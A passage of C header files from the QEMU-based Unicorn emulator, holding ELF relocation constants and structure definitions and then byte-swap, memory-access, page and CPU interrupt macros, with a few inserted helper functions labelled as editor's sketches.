Dyn d_tag field. */ #define DT_IA_64_PLT_RESERVE (DT_LOPROC + 0) #define DT_IA_64_NUM 1 /* IA-64 relocations. 
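 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * How the IA-64 e_flags bits above are typically tested; the helper
 * names are hypothetical and <stdint.h> is assumed.
 */
static inline int ia64_is_64bit_abi(uint32_t e_flags)
{
    return (e_flags & EF_IA_64_ABI64) != 0;
}

static inline uint32_t ia64_arch_version(uint32_t e_flags)
{
    return e_flags & EF_IA_64_ARCH; /* top byte carries the arch. version */
}

/* IA-64 relocations: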
*/ #define R_IA64_NONE 0x00 /* none */ #define R_IA64_IMM14 0x21 /* symbol + addend, add imm14 */ #define R_IA64_IMM22 0x22 /* symbol + addend, add imm22 */ #define R_IA64_IMM64 0x23 /* symbol + addend, mov imm64 */ #define R_IA64_DIR32MSB 0x24 /* symbol + addend, data4 MSB */ #define R_IA64_DIR32LSB 0x25 /* symbol + addend, data4 LSB */ #define R_IA64_DIR64MSB 0x26 /* symbol + addend, data8 MSB */ #define R_IA64_DIR64LSB 0x27 /* symbol + addend, data8 LSB */ #define R_IA64_GPREL22 0x2a /* @gprel(sym + add), add imm22 */ #define R_IA64_GPREL64I 0x2b /* @gprel(sym + add), mov imm64 */ #define R_IA64_GPREL32MSB 0x2c /* @gprel(sym + add), data4 MSB */ #define R_IA64_GPREL32LSB 0x2d /* @gprel(sym + add), data4 LSB */ #define R_IA64_GPREL64MSB 0x2e /* @gprel(sym + add), data8 MSB */ #define R_IA64_GPREL64LSB 0x2f /* @gprel(sym + add), data8 LSB */ #define R_IA64_LTOFF22 0x32 /* @ltoff(sym + add), add imm22 */ #define R_IA64_LTOFF64I 0x33 /* @ltoff(sym + add), mov imm64 */ #define R_IA64_PLTOFF22 0x3a /* @pltoff(sym + add), add imm22 */ #define R_IA64_PLTOFF64I 0x3b /* @pltoff(sym + add), mov imm64 */ #define R_IA64_PLTOFF64MSB 0x3e /* @pltoff(sym + add), data8 MSB */ #define R_IA64_PLTOFF64LSB 0x3f /* @pltoff(sym + add), data8 LSB */ #define R_IA64_FPTR64I 0x43 /* @fptr(sym + add), mov imm64 */ #define R_IA64_FPTR32MSB 0x44 /* @fptr(sym + add), data4 MSB */ #define R_IA64_FPTR32LSB 0x45 /* @fptr(sym + add), data4 LSB */ #define R_IA64_FPTR64MSB 0x46 /* @fptr(sym + add), data8 MSB */ #define R_IA64_FPTR64LSB 0x47 /* @fptr(sym + add), data8 LSB */ #define R_IA64_PCREL60B 0x48 /* @pcrel(sym + add), brl */ #define R_IA64_PCREL21B 0x49 /* @pcrel(sym + add), ptb, call */ #define R_IA64_PCREL21M 0x4a /* @pcrel(sym + add), chk.s */ #define R_IA64_PCREL21F 0x4b /* @pcrel(sym + add), fchkf */ #define R_IA64_PCREL32MSB 0x4c /* @pcrel(sym + add), data4 MSB */ #define R_IA64_PCREL32LSB 0x4d /* @pcrel(sym + add), data4 LSB */ #define R_IA64_PCREL64MSB 0x4e /* @pcrel(sym + add), data8 MSB */ #define R_IA64_PCREL64LSB 0x4f /* @pcrel(sym + add), data8 LSB */ #define R_IA64_LTOFF_FPTR22 0x52 /* @ltoff(@fptr(s+a)), imm22 */ #define R_IA64_LTOFF_FPTR64I 0x53 /* @ltoff(@fptr(s+a)), imm64 */ #define R_IA64_LTOFF_FPTR32MSB 0x54 /* @ltoff(@fptr(s+a)), data4 MSB */ #define R_IA64_LTOFF_FPTR32LSB 0x55 /* @ltoff(@fptr(s+a)), data4 LSB */ #define R_IA64_LTOFF_FPTR64MSB 0x56 /* @ltoff(@fptr(s+a)), data8 MSB */ #define R_IA64_LTOFF_FPTR64LSB 0x57 /* @ltoff(@fptr(s+a)), data8 LSB */ #define R_IA64_SEGREL32MSB 0x5c /* @segrel(sym + add), data4 MSB */ #define R_IA64_SEGREL32LSB 0x5d /* @segrel(sym + add), data4 LSB */ #define R_IA64_SEGREL64MSB 0x5e /* @segrel(sym + add), data8 MSB */ #define R_IA64_SEGREL64LSB 0x5f /* @segrel(sym + add), data8 LSB */ #define R_IA64_SECREL32MSB 0x64 /* @secrel(sym + add), data4 MSB */ #define R_IA64_SECREL32LSB 0x65 /* @secrel(sym + add), data4 LSB */ #define R_IA64_SECREL64MSB 0x66 /* @secrel(sym + add), data8 MSB */ #define R_IA64_SECREL64LSB 0x67 /* @secrel(sym + add), data8 LSB */ #define R_IA64_REL32MSB 0x6c /* data 4 + REL */ #define R_IA64_REL32LSB 0x6d /* data 4 + REL */ #define R_IA64_REL64MSB 0x6e /* data 8 + REL */ #define R_IA64_REL64LSB 0x6f /* data 8 + REL */ #define R_IA64_LTV32MSB 0x74 /* symbol + addend, data4 MSB */ #define R_IA64_LTV32LSB 0x75 /* symbol + addend, data4 LSB */ #define R_IA64_LTV64MSB 0x76 /* symbol + addend, data8 MSB */ #define R_IA64_LTV64LSB 0x77 /* symbol + addend, data8 LSB */ #define R_IA64_PCREL21BI 0x79 /* @pcrel(sym + add), 21bit inst */ #define 
R_IA64_PCREL22 0x7a /* @pcrel(sym + add), 22bit inst */ #define R_IA64_PCREL64I 0x7b /* @pcrel(sym + add), 64bit inst */ #define R_IA64_IPLTMSB 0x80 /* dynamic reloc, imported PLT, MSB */ #define R_IA64_IPLTLSB 0x81 /* dynamic reloc, imported PLT, LSB */ #define R_IA64_COPY 0x84 /* copy relocation */ #define R_IA64_SUB 0x85 /* Addend and symbol difference */ #define R_IA64_LTOFF22X 0x86 /* LTOFF22, relaxable. */ #define R_IA64_LDXMOV 0x87 /* Use of LTOFF22X. */ #define R_IA64_TPREL14 0x91 /* @tprel(sym + add), imm14 */ #define R_IA64_TPREL22 0x92 /* @tprel(sym + add), imm22 */ #define R_IA64_TPREL64I 0x93 /* @tprel(sym + add), imm64 */ #define R_IA64_TPREL64MSB 0x96 /* @tprel(sym + add), data8 MSB */ #define R_IA64_TPREL64LSB 0x97 /* @tprel(sym + add), data8 LSB */ #define R_IA64_LTOFF_TPREL22 0x9a /* @ltoff(@tprel(s+a)), imm2 */ #define R_IA64_DTPMOD64MSB 0xa6 /* @dtpmod(sym + add), data8 MSB */ #define R_IA64_DTPMOD64LSB 0xa7 /* @dtpmod(sym + add), data8 LSB */ #define R_IA64_LTOFF_DTPMOD22 0xaa /* @ltoff(@dtpmod(sym + add)), imm22 */ #define R_IA64_DTPREL14 0xb1 /* @dtprel(sym + add), imm14 */ #define R_IA64_DTPREL22 0xb2 /* @dtprel(sym + add), imm22 */ #define R_IA64_DTPREL64I 0xb3 /* @dtprel(sym + add), imm64 */ #define R_IA64_DTPREL32MSB 0xb4 /* @dtprel(sym + add), data4 MSB */ #define R_IA64_DTPREL32LSB 0xb5 /* @dtprel(sym + add), data4 LSB */ #define R_IA64_DTPREL64MSB 0xb6 /* @dtprel(sym + add), data8 MSB */ #define R_IA64_DTPREL64LSB 0xb7 /* @dtprel(sym + add), data8 LSB */ #define R_IA64_LTOFF_DTPREL22 0xba /* @ltoff(@dtprel(s+a)), imm22 */ /* RISC-V relocations. */ #define R_RISCV_NONE 0 #define R_RISCV_32 1 #define R_RISCV_64 2 #define R_RISCV_RELATIVE 3 #define R_RISCV_COPY 4 #define R_RISCV_JUMP_SLOT 5 #define R_RISCV_TLS_DTPMOD32 6 #define R_RISCV_TLS_DTPMOD64 7 #define R_RISCV_TLS_DTPREL32 8 #define R_RISCV_TLS_DTPREL64 9 #define R_RISCV_TLS_TPREL32 10 #define R_RISCV_TLS_TPREL64 11 #define R_RISCV_BRANCH 16 #define R_RISCV_JAL 17 #define R_RISCV_CALL 18 #define R_RISCV_CALL_PLT 19 #define R_RISCV_GOT_HI20 20 #define R_RISCV_TLS_GOT_HI20 21 #define R_RISCV_TLS_GD_HI20 22 #define R_RISCV_PCREL_HI20 23 #define R_RISCV_PCREL_LO12_I 24 #define R_RISCV_PCREL_LO12_S 25 #define R_RISCV_HI20 26 #define R_RISCV_LO12_I 27 #define R_RISCV_LO12_S 28 #define R_RISCV_TPREL_HI20 29 #define R_RISCV_TPREL_LO12_I 30 #define R_RISCV_TPREL_LO12_S 31 #define R_RISCV_TPREL_ADD 32 #define R_RISCV_ADD8 33 #define R_RISCV_ADD16 34 #define R_RISCV_ADD32 35 #define R_RISCV_ADD64 36 #define R_RISCV_SUB8 37 #define R_RISCV_SUB16 38 #define R_RISCV_SUB32 39 #define R_RISCV_SUB64 40 #define R_RISCV_GNU_VTINHERIT 41 #define R_RISCV_GNU_VTENTRY 42 #define R_RISCV_ALIGN 43 #define R_RISCV_RVC_BRANCH 44 #define R_RISCV_RVC_JUMP 45 #define R_RISCV_RVC_LUI 46 #define R_RISCV_GPREL_I 47 #define R_RISCV_GPREL_S 48 #define R_RISCV_TPREL_I 49 #define R_RISCV_TPREL_S 50 #define R_RISCV_RELAX 51 #define R_RISCV_SUB6 52 #define R_RISCV_SET6 53 #define R_RISCV_SET8 54 #define R_RISCV_SET16 55 #define R_RISCV_SET32 56 /* RISC-V ELF Flags. 
*/ #define EF_RISCV_RVC 0x0001 #define EF_RISCV_FLOAT_ABI 0x0006 #define EF_RISCV_FLOAT_ABI_SOFT 0x0000 #define EF_RISCV_FLOAT_ABI_SINGLE 0x0002 #define EF_RISCV_FLOAT_ABI_DOUBLE 0x0004 #define EF_RISCV_FLOAT_ABI_QUAD 0x0006 #define EF_RISCV_RVE 0x0008 #define EF_RISCV_TSO 0x0010 typedef struct elf32_rel { Elf32_Addr r_offset; Elf32_Word r_info; } Elf32_Rel; typedef struct elf64_rel { Elf64_Addr r_offset; /* Location at which to apply the action */ Elf64_Xword r_info; /* index and type of relocation */ } Elf64_Rel; typedef struct elf32_rela{ Elf32_Addr r_offset; Elf32_Word r_info; Elf32_Sword r_addend; } Elf32_Rela; typedef struct elf64_rela { Elf64_Addr r_offset; /* Location at which to apply the action */ Elf64_Xword r_info; /* index and type of relocation */ Elf64_Sxword r_addend; /* Constant addend used to compute value */ } Elf64_Rela; typedef struct elf32_sym{ Elf32_Word st_name; Elf32_Addr st_value; Elf32_Word st_size; unsigned char st_info; unsigned char st_other; Elf32_Half st_shndx; } Elf32_Sym; typedef struct elf64_sym { Elf64_Word st_name; /* Symbol name, index in string tbl */ unsigned char st_info; /* Type and binding attributes */ unsigned char st_other; /* No defined meaning, 0 */ Elf64_Half st_shndx; /* Associated section index */ Elf64_Addr st_value; /* Value of the symbol */ Elf64_Xword st_size; /* Associated symbol size */ } Elf64_Sym; #define EI_NIDENT 16 /* Special value for e_phnum. This indicates that the real number of program headers is too large to fit into e_phnum. Instead the real value is in the field sh_info of section 0. */ #define PN_XNUM 0xffff typedef struct elf32_hdr{ unsigned char e_ident[EI_NIDENT]; Elf32_Half e_type; Elf32_Half e_machine; Elf32_Word e_version; Elf32_Addr e_entry; /* Entry point */ Elf32_Off e_phoff; Elf32_Off e_shoff; Elf32_Word e_flags; Elf32_Half e_ehsize; Elf32_Half e_phentsize; Elf32_Half e_phnum; Elf32_Half e_shentsize; Elf32_Half e_shnum; Elf32_Half e_shstrndx; } Elf32_Ehdr; typedef struct elf64_hdr { unsigned char e_ident[16]; /* ELF "magic number" */ Elf64_Half e_type; Elf64_Half e_machine; Elf64_Word e_version; Elf64_Addr e_entry; /* Entry point virtual address */ Elf64_Off e_phoff; /* Program header table file offset */ Elf64_Off e_shoff; /* Section header table file offset */ Elf64_Word e_flags; Elf64_Half e_ehsize; Elf64_Half e_phentsize; Elf64_Half e_phnum; Elf64_Half e_shentsize; Elf64_Half e_shnum; Elf64_Half e_shstrndx; } Elf64_Ehdr; /* These constants define the permissions on sections in the program header, p_flags. 
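 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * Reading the RISC-V floating-point ABI out of an ELF header, using the
 * EF_RISCV_* masks and the Elf64_Ehdr layout defined above. The helper
 * name is hypothetical.
 */
static inline int riscv_uses_double_float_abi(const Elf64_Ehdr *ehdr)
{
    return (ehdr->e_flags & EF_RISCV_FLOAT_ABI) == EF_RISCV_FLOAT_ABI_DOUBLE;
}

/* Section permissions in p_flags: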
*/ #define PF_R 0x4 #define PF_W 0x2 #define PF_X 0x1 typedef struct elf32_phdr{ Elf32_Word p_type; Elf32_Off p_offset; Elf32_Addr p_vaddr; Elf32_Addr p_paddr; Elf32_Word p_filesz; Elf32_Word p_memsz; Elf32_Word p_flags; Elf32_Word p_align; } Elf32_Phdr; typedef struct elf64_phdr { Elf64_Word p_type; Elf64_Word p_flags; Elf64_Off p_offset; /* Segment file offset */ Elf64_Addr p_vaddr; /* Segment virtual address */ Elf64_Addr p_paddr; /* Segment physical address */ Elf64_Xword p_filesz; /* Segment size in file */ Elf64_Xword p_memsz; /* Segment size in memory */ Elf64_Xword p_align; /* Segment alignment, file & memory */ } Elf64_Phdr; /* sh_type */ #define SHT_NULL 0 #define SHT_PROGBITS 1 #define SHT_SYMTAB 2 #define SHT_STRTAB 3 #define SHT_RELA 4 #define SHT_HASH 5 #define SHT_DYNAMIC 6 #define SHT_NOTE 7 #define SHT_NOBITS 8 #define SHT_REL 9 #define SHT_SHLIB 10 #define SHT_DYNSYM 11 #define SHT_NUM 12 #define SHT_LOPROC 0x70000000 #define SHT_HIPROC 0x7fffffff #define SHT_LOUSER 0x80000000 #define SHT_HIUSER 0xffffffff #define SHT_MIPS_LIST 0x70000000 #define SHT_MIPS_CONFLICT 0x70000002 #define SHT_MIPS_GPTAB 0x70000003 #define SHT_MIPS_UCODE 0x70000004 /* sh_flags */ #define SHF_WRITE 0x1 #define SHF_ALLOC 0x2 #define SHF_EXECINSTR 0x4 #define SHF_MASKPROC 0xf0000000 #define SHF_MIPS_GPREL 0x10000000 /* special section indexes */ #define SHN_UNDEF 0 #define SHN_LORESERVE 0xff00 #define SHN_LOPROC 0xff00 #define SHN_HIPROC 0xff1f #define SHN_ABS 0xfff1 #define SHN_COMMON 0xfff2 #define SHN_HIRESERVE 0xffff #define SHN_MIPS_ACCOMON 0xff00 typedef struct elf32_shdr { Elf32_Word sh_name; Elf32_Word sh_type; Elf32_Word sh_flags; Elf32_Addr sh_addr; Elf32_Off sh_offset; Elf32_Word sh_size; Elf32_Word sh_link; Elf32_Word sh_info; Elf32_Word sh_addralign; Elf32_Word sh_entsize; } Elf32_Shdr; typedef struct elf64_shdr { Elf64_Word sh_name; /* Section name, index in string tbl */ Elf64_Word sh_type; /* Type of section */ Elf64_Xword sh_flags; /* Miscellaneous section attributes */ Elf64_Addr sh_addr; /* Section virtual addr at execution */ Elf64_Off sh_offset; /* Section file offset */ Elf64_Xword sh_size; /* Size of section in bytes */ Elf64_Word sh_link; /* Index of another section */ Elf64_Word sh_info; /* Additional section information */ Elf64_Xword sh_addralign; /* Section alignment */ Elf64_Xword sh_entsize; /* Entry size if section holds table */ } Elf64_Shdr; #define EI_MAG0 0 /* e_ident[] indexes */ #define EI_MAG1 1 #define EI_MAG2 2 #define EI_MAG3 3 #define EI_CLASS 4 #define EI_DATA 5 #define EI_VERSION 6 #define EI_OSABI 7 #define EI_PAD 8 #define ELFOSABI_NONE 0 /* UNIX System V ABI */ #define ELFOSABI_SYSV 0 /* Alias. */ #define ELFOSABI_HPUX 1 /* HP-UX */ #define ELFOSABI_NETBSD 2 /* NetBSD. */ #define ELFOSABI_LINUX 3 /* Linux. */ #define ELFOSABI_SOLARIS 6 /* Sun Solaris. */ #define ELFOSABI_AIX 7 /* IBM AIX. */ #define ELFOSABI_IRIX 8 /* SGI Irix. */ #define ELFOSABI_FREEBSD 9 /* FreeBSD. */ #define ELFOSABI_TRU64 10 /* Compaq TRU64 UNIX. */ #define ELFOSABI_MODESTO 11 /* Novell Modesto. */ #define ELFOSABI_OPENBSD 12 /* OpenBSD. 
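 */

/*
 * Editor's illustrative sketches -- not part of the original header.
 * Two small checks built from the definitions above: testing segment
 * permissions via the PF_* bits of Elf64_Phdr, and validating the four
 * e_ident magic bytes by index (the byte values 0x7f 'E' 'L' 'F' are the
 * standard ELF magic, given symbolic names further below). Helper names
 * are hypothetical.
 */
static inline int phdr_is_writable_code(const Elf64_Phdr *ph)
{
    /* W^X violations are often worth flagging when mapping segments. */
    return (ph->p_flags & (PF_W | PF_X)) == (PF_W | PF_X);
}

static inline int elf_ident_magic_ok(const unsigned char *e_ident)
{
    return e_ident[EI_MAG0] == 0x7f && e_ident[EI_MAG1] == 'E' &&
           e_ident[EI_MAG2] == 'L' && e_ident[EI_MAG3] == 'F';
}

/* OS ABI values, continued: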
*/ #define ELFOSABI_ARM_FDPIC 65 /* ARM FDPIC */ #define ELFOSABI_ARM 97 /* ARM */ #define ELFOSABI_STANDALONE 255 /* Standalone (embedded) application */ #define ELFMAG0 0x7f /* EI_MAG */ #define ELFMAG1 'E' #define ELFMAG2 'L' #define ELFMAG3 'F' #define ELFMAG "\177ELF" #define SELFMAG 4 #define ELFCLASSNONE 0 /* EI_CLASS */ #define ELFCLASS32 1 #define ELFCLASS64 2 #define ELFCLASSNUM 3 #define ELFDATANONE 0 /* e_ident[EI_DATA] */ #define ELFDATA2LSB 1 #define ELFDATA2MSB 2 #define EV_NONE 0 /* e_version, EI_VERSION */ #define EV_CURRENT 1 #define EV_NUM 2 /* Notes used in ET_CORE */ #define NT_PRSTATUS 1 #define NT_FPREGSET 2 #define NT_PRFPREG 2 #define NT_PRPSINFO 3 #define NT_TASKSTRUCT 4 #define NT_AUXV 6 #define NT_PRXFPREG 0x46e62b7f /* copied from gdb5.1/include/elf/common.h */ #define NT_S390_GS_CB 0x30b /* s390 guarded storage registers */ #define NT_S390_VXRS_HIGH 0x30a /* s390 vector registers 16-31 */ #define NT_S390_VXRS_LOW 0x309 /* s390 vector registers 0-15 (lower half) */ #define NT_S390_PREFIX 0x305 /* s390 prefix register */ #define NT_S390_CTRS 0x304 /* s390 control registers */ #define NT_S390_TODPREG 0x303 /* s390 TOD programmable register */ #define NT_S390_TODCMP 0x302 /* s390 TOD clock comparator register */ #define NT_S390_TIMER 0x301 /* s390 timer register */ #define NT_PPC_VMX 0x100 /* PowerPC Altivec/VMX registers */ #define NT_PPC_SPE 0x101 /* PowerPC SPE/EVR registers */ #define NT_PPC_VSX 0x102 /* PowerPC VSX registers */ #define NT_ARM_VFP 0x400 /* ARM VFP/NEON registers */ #define NT_ARM_TLS 0x401 /* ARM TLS register */ #define NT_ARM_HW_BREAK 0x402 /* ARM hardware breakpoint registers */ #define NT_ARM_HW_WATCH 0x403 /* ARM hardware watchpoint registers */ #define NT_ARM_SYSTEM_CALL 0x404 /* ARM system call number */ #define NT_ARM_SVE 0x405 /* ARM Scalable Vector Extension regs */ /* * Physical entry point into the kernel. * * 32bit entry point into the kernel. When requested to launch the * guest kernel, use this entry point to launch the guest in 32-bit * protected mode with paging disabled. * * [ Corresponding definition in Linux kernel: include/xen/interface/elfnote.h ] */ #define XEN_ELFNOTE_PHYS32_ENTRY 18 /* 0x12 */ /* Note header in a PT_NOTE section */ typedef struct elf32_note { Elf32_Word n_namesz; /* Name size */ Elf32_Word n_descsz; /* Content size */ Elf32_Word n_type; /* Content type */ } Elf32_Nhdr; /* Note header in a PT_NOTE section */ typedef struct elf64_note { Elf64_Word n_namesz; /* Name size */ Elf64_Word n_descsz; /* Content size */ Elf64_Word n_type; /* Content type */ } Elf64_Nhdr; /* This data structure represents a PT_LOAD segment. */ struct elf32_fdpic_loadseg { /* Core address to which the segment is mapped. */ Elf32_Addr addr; /* VMA recorded in the program header. */ Elf32_Addr p_vaddr; /* Size of this segment in memory. */ Elf32_Word p_memsz; }; struct elf32_fdpic_loadmap { /* Protocol version number, must be zero. */ Elf32_Half version; /* Number of segments in this map. */ Elf32_Half nsegs; /* The actual memory map. 
 */
  struct elf32_fdpic_loadseg segs[/*nsegs*/];
};

#ifdef ELF_CLASS
#if ELF_CLASS == ELFCLASS32

#define elfhdr elf32_hdr
#define elf_phdr elf32_phdr
#define elf_note elf32_note
#define elf_shdr elf32_shdr
#define elf_sym elf32_sym
#define elf_addr_t Elf32_Off
#define elf_rela elf32_rela

#ifdef ELF_USES_RELOCA
# define ELF_RELOC Elf32_Rela
#else
# define ELF_RELOC Elf32_Rel
#endif

#else

#define elfhdr elf64_hdr
#define elf_phdr elf64_phdr
#define elf_note elf64_note
#define elf_shdr elf64_shdr
#define elf_sym elf64_sym
#define elf_addr_t Elf64_Off
#define elf_rela elf64_rela

#ifdef ELF_USES_RELOCA
# define ELF_RELOC Elf64_Rela
#else
# define ELF_RELOC Elf64_Rel
#endif

#endif /* ELF_CLASS */

#ifndef ElfW
# if ELF_CLASS == ELFCLASS32
#  define ElfW(x) Elf32_ ## x
#  define ELFW(x) ELF32_ ## x
# else
#  define ElfW(x) Elf64_ ## x
#  define ELFW(x) ELF64_ ## x
# endif
#endif

#endif /* ELF_CLASS */

#endif /* QEMU_ELF_H */

unicorn-2.1.1/qemu/include/exec/cpu-all.h

/*
 * defines common to all virtual CPUs
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
#ifndef CPU_ALL_H
#define CPU_ALL_H

#include "exec/cpu-common.h"
#include "exec/memory.h"
#include "qemu/thread.h"
#include "hw/core/cpu.h"
#include <uc_priv.h>
#if 0
#include "qemu/rcu.h"
#endif

#define EXCP_INTERRUPT 0x10000 /* async interruption */
#define EXCP_HLT 0x10001       /* hlt instruction reached */
#define EXCP_DEBUG 0x10002     /* cpu stopped after a breakpoint or singlestep */
#define EXCP_HALTED 0x10003    /* cpu is halted (waiting for external event) */
#define EXCP_YIELD 0x10004     /* cpu wants to yield timeslice to another */
#define EXCP_ATOMIC 0x10005    /* stop-the-world and emulate atomic */

/* some important defines:
 *
 * HOST_WORDS_BIGENDIAN : if defined, the host cpu is big endian and
 * otherwise little endian.
* * TARGET_WORDS_BIGENDIAN : same for target cpu */ #if defined(HOST_WORDS_BIGENDIAN) != defined(TARGET_WORDS_BIGENDIAN) #define BSWAP_NEEDED #endif #ifdef BSWAP_NEEDED static inline uint16_t tswap16(uint16_t s) { return bswap16(s); } static inline uint32_t tswap32(uint32_t s) { return bswap32(s); } static inline uint64_t tswap64(uint64_t s) { return bswap64(s); } static inline void tswap16s(uint16_t *s) { *s = bswap16(*s); } static inline void tswap32s(uint32_t *s) { *s = bswap32(*s); } static inline void tswap64s(uint64_t *s) { *s = bswap64(*s); } #else static inline uint16_t tswap16(uint16_t s) { return s; } static inline uint32_t tswap32(uint32_t s) { return s; } static inline uint64_t tswap64(uint64_t s) { return s; } static inline void tswap16s(uint16_t *s) { } static inline void tswap32s(uint32_t *s) { } static inline void tswap64s(uint64_t *s) { } #endif #if TARGET_LONG_SIZE == 4 #define tswapl(s) tswap32(s) #define tswapls(s) tswap32s((uint32_t *)(s)) #define bswaptls(s) bswap32s(s) #else #define tswapl(s) tswap64(s) #define tswapls(s) tswap64s((uint64_t *)(s)) #define bswaptls(s) bswap64s(s) #endif /* Target-endianness CPU memory access functions. These fit into the * {ld,st}{type}{sign}{size}{endian}_p naming scheme described in bswap.h. */ #if defined(TARGET_WORDS_BIGENDIAN) #define lduw_p(p) lduw_be_p(p) #define ldsw_p(p) ldsw_be_p(p) #define ldl_p(p) ldl_be_p(p) #define ldq_p(p) ldq_be_p(p) #define ldfl_p(p) ldfl_be_p(p) #define ldfq_p(p) ldfq_be_p(p) #define stw_p(p, v) stw_be_p(p, v) #define stl_p(p, v) stl_be_p(p, v) #define stq_p(p, v) stq_be_p(p, v) #define stfl_p(p, v) stfl_be_p(p, v) #define stfq_p(p, v) stfq_be_p(p, v) #define ldn_p(p, sz) ldn_be_p(p, sz) #define stn_p(p, sz, v) stn_be_p(p, sz, v) #else #define lduw_p(p) lduw_le_p(p) #define ldsw_p(p) ldsw_le_p(p) #define ldl_p(p) ldl_le_p(p) #define ldq_p(p) ldq_le_p(p) #define ldfl_p(p) ldfl_le_p(p) #define ldfq_p(p) ldfq_le_p(p) #define stw_p(p, v) stw_le_p(p, v) #define stl_p(p, v) stl_le_p(p, v) #define stq_p(p, v) stq_le_p(p, v) #define stfl_p(p, v) stfl_le_p(p, v) #define stfq_p(p, v) stfq_le_p(p, v) #define ldn_p(p, sz) ldn_le_p(p, sz) #define stn_p(p, sz, v) stn_le_p(p, sz, v) #endif /* MMU memory access macros */ #include "exec/hwaddr.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define ARG1 as #define ARG1_DECL AddressSpace *as #define TARGET_ENDIANNESS #include "exec/memory_ldst.inc.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached_slow, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached_slow #endif #define ARG1 cache #define ARG1_DECL MemoryRegionCache *cache #define TARGET_ENDIANNESS #include "exec/memory_ldst.inc.h" static inline void stl_phys_notdirty(AddressSpace *as, hwaddr addr, uint32_t val) { #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl_notdirty, UNICORN_ARCH_POSTFIX) (as->uc, as, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); #else address_space_stl_notdirty(as->uc, as, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); #endif } #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define ARG1 as #define ARG1_DECL AddressSpace *as #define TARGET_ENDIANNESS #include "exec/memory_ldst_phys.inc.h" /* Inline fast path for direct RAM access. 
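 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * tswap32() above byte-swaps only when host and target endianness differ,
 * so on a little-endian host emulating a big-endian target
 * tswap32(0x11223344) == 0x44332211, and in either configuration the swap
 * is its own inverse. The helper name is hypothetical.
 */
static inline int tswap32_roundtrips(uint32_t x)
{
    return tswap32(tswap32(x)) == x; /* holds in both configurations */
}

/* Inline fast path for direct RAM access, continued: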
*/ #define ENDIANNESS #include "exec/memory_ldst_cached.inc.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached #endif #define ARG1 cache #define ARG1_DECL MemoryRegionCache *cache #define TARGET_ENDIANNESS #include "exec/memory_ldst_phys.inc.h" /* page related stuff */ #ifdef TARGET_PAGE_BITS_VARY typedef struct TargetPageBits { bool decided; int bits; target_long mask; } TargetPageBits; #if defined(CONFIG_ATTRIBUTE_ALIAS) || !defined(IN_EXEC_VARY) extern const TargetPageBits target_page; #else extern TargetPageBits target_page; #endif #ifdef CONFIG_DEBUG_TCG #define TARGET_PAGE_BITS ({ assert(target_page.decided); target_page.bits; }) #define TARGET_PAGE_MASK ({ assert(target_page.decided); target_page.mask; }) #else #define TARGET_PAGE_BITS uc->init_target_page->bits #define TARGET_PAGE_MASK uc->init_target_page->mask #endif #define TARGET_PAGE_SIZE (-(int)TARGET_PAGE_MASK) // qq #else #define TARGET_PAGE_BITS_MIN TARGET_PAGE_BITS #define TARGET_PAGE_SIZE (1 << TARGET_PAGE_BITS) #define TARGET_PAGE_MASK ((target_ulong)-1 << TARGET_PAGE_BITS) #endif #define TARGET_PAGE_ALIGN(addr) ROUND_UP((addr), TARGET_PAGE_SIZE) #define HOST_PAGE_ALIGN(uc, addr) ROUND_UP((addr), uc->qemu_host_page_size) #if 0 #define REAL_HOST_PAGE_ALIGN(addr) ROUND_UP((addr), uc->qemu_real_host_page_size) #endif /* same as PROT_xxx */ #define PAGE_READ 0x0001 #define PAGE_WRITE 0x0002 #define PAGE_EXEC 0x0004 #define PAGE_BITS (PAGE_READ | PAGE_WRITE | PAGE_EXEC) #define PAGE_VALID 0x0008 /* original state of the write flag (used when tracking self-modifying code */ #define PAGE_WRITE_ORG 0x0010 /* Invalidate the TLB entry immediately, helpful for s390x * Low-Address-Protection. Used with PAGE_WRITE in tlb_set_page_with_attrs() */ #define PAGE_WRITE_INV 0x0040 CPUArchState *cpu_copy(CPUArchState *env); /* Flags for use in ENV->INTERRUPT_PENDING. The numbers assigned here are non-sequential in order to preserve binary compatibility with the vmstate dump. Bit 0 (0x0001) was previously used for CPU_INTERRUPT_EXIT, and is cleared when loading the vmstate dump. */ /* External hardware interrupt pending. This is typically used for interrupts from devices. */ #define CPU_INTERRUPT_HARD 0x0002 /* Exit the current TB. This is typically used when some system-level device makes some change to the memory mapping. E.g. the a20 line change. */ #define CPU_INTERRUPT_EXITTB 0x0004 /* Halt the CPU. */ #define CPU_INTERRUPT_HALT 0x0020 /* Debug event pending. */ #define CPU_INTERRUPT_DEBUG 0x0080 /* Reset signal. */ #define CPU_INTERRUPT_RESET 0x0400 /* Several target-specific external hardware interrupts. Each target/cpu.h should define proper names based on these defines. */ #define CPU_INTERRUPT_TGT_EXT_0 0x0008 #define CPU_INTERRUPT_TGT_EXT_1 0x0010 #define CPU_INTERRUPT_TGT_EXT_2 0x0040 #define CPU_INTERRUPT_TGT_EXT_3 0x0200 #define CPU_INTERRUPT_TGT_EXT_4 0x1000 /* Several target-specific internal interrupts. These differ from the preceding target-specific interrupts in that they are intended to originate from within the cpu itself, typically in response to some instruction being executed. These, therefore, are not masked while single-stepping within the debugger. */ #define CPU_INTERRUPT_TGT_INT_0 0x0100 #define CPU_INTERRUPT_TGT_INT_1 0x0800 #define CPU_INTERRUPT_TGT_INT_2 0x2000 /* First unused bit: 0x4000. */ /* The set of all bits that should be masked 